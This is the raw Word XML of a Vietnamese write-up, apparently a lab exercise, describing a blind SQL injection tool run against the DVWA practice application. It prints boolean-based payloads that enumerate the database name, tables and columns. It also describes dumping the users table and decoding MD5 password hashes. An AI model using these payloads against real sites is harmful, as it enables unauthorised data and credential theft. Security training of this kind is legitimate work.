          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"1' AND ascii(lower(substring((SELECT DATABASE()), 1,1))) &gt;= 127 #"</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Ý nghĩa: Dò ký tự đầu tiên theo ý tưởng đã trình bày ở trên.</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dvwa</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nhấn nút ‘Get tables name’: Tool sẽ thực hiện lần lượt các truy vấn:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A1752"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w:t>
      </w:r>
      <w:r w:rsidR="001A1752">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> số lượng tables:</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Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">"1' AND (SELECT COUNT(*) FROM information_schema.TABLES WHERE TABLE_SCHEMA LIKE 'dvwa') &gt;= </w:t>
      </w:r>
      <w:r w:rsidR="00D917A6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>127</w:t>
      </w:r>
      <w:r w:rsidR="00AE647A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"</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2</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tên table đầu tiên:</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Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"1' AND ascii(lower(substring((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA LIKE 'dvwa' LIMIT 0, 1), 0,1))) &gt;= 127 #"</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guestbook</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tên table thứ hai:</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Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">"1' AND ascii(lower(substring((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>TABLE_SCHEMA LIKE 'dvwa' LIMIT 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 1), 0,1))) &gt;= 127 #"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A1752"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users</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nhấn nút ‘Get columns name’: Tool sẽ thực hiện lần lượt các truy vấn:</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số lượng cột của table “users”:</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Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"1' AND (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA LI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>KE 'dvwa' AND TABLE_NAME LIKE 'users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>') &gt;= 127 #"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A1752"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8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917A6"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tên các column của table users:</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user_id, first_name, last_name, user, password, avatar, last_login, failed_login</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với table “guestbook”</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nhấn nút ‘Get data table’:</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số lượng rows trong table “user”:</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trường dữ liệu đầu tiên:</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dữ liệu column “user_id”:</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dữ liệu column “first_name”:</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với các column còn lại.</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trường dữ liệu thứ hai:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E55CA4" w:rsidRDefault="00E55CA4" w:rsidP="00E55CA4">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dữ liệu column “user_id”:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E55CA4" w:rsidRDefault="00E55CA4" w:rsidP="00E55CA4">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E55CA4">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dữ liệu column “first_name”:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E55CA4" w:rsidRDefault="00E55CA4" w:rsidP="00E55CA4">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với các column còn lại.</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Tương tự với các trường còn lại dựa vào số rows ta thay đổi: </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Việc này cũng tương tự đối với table “guestbook”</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đó ta đã có bảng dữ liệu của database dvwa.</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lastRenderedPageBreak/>
        <w:t>Lúc này password đang được mã hó theo MD5 nên có thể nhấn nút DeCode Password để giải mã password.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E5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71181"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="31D42354"/>
    <w:lvl w:ilvl="0" w:tplc="D0E4564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E0DD0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DEF028A8"/>
    <w:lvl w:ilvl="0" w:tplc="EF5AEF3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B6C51"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7766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F5"/>
    <w:rsid w:val="0012564F"/>
    <w:rsid w:val="00171E4E"/>
    <w:rsid w:val="001A1752"/>
    <w:rsid w:val="005C6497"/>
    <w:rsid w:val="0062545F"/>
    <w:rsid w:val="0070504C"/>
    <w:rsid w:val="00714678"/>
    <w:rsid w:val="008B1567"/>
    <w:rsid w:val="008D6FEC"/>
    <w:rsid w:val="009C05F5"/>
    <w:rsid w:val="00A24BEA"/>
    <w:rsid w:val="00AE647A"/>
    <w:rsid w:val="00B33C0C"/>
    <w:rsid w:val="00B53A15"/>
    <w:rsid w:val="00BA1AEA"/>
    <w:rsid w:val="00C131C0"/>
    <w:rsid w:val="00D917A6"/>
    <w:rsid w:val="00E16240"/>
    <w:rsid w:val="00E55CA4"/>
    <w:rsid w:val="00E8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85D62-0C37-4BB8-8A28-131BCFB4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5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545F"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="005C6497"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E81C7A"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-keyword">
    <w:name w:val="cm-keyword"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A24BEA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-variable-2">
    <w:name w:val="cm-variable-2"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A24BEA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-string">
    <w:name w:val="cm-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A24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036163">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="176279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mysql.com/doc/refman/8.0/en/information-schema.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94090-A5C3-4104-87C8-59D5CE09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DC</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nguyên DC</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-06T12:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-07T09:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>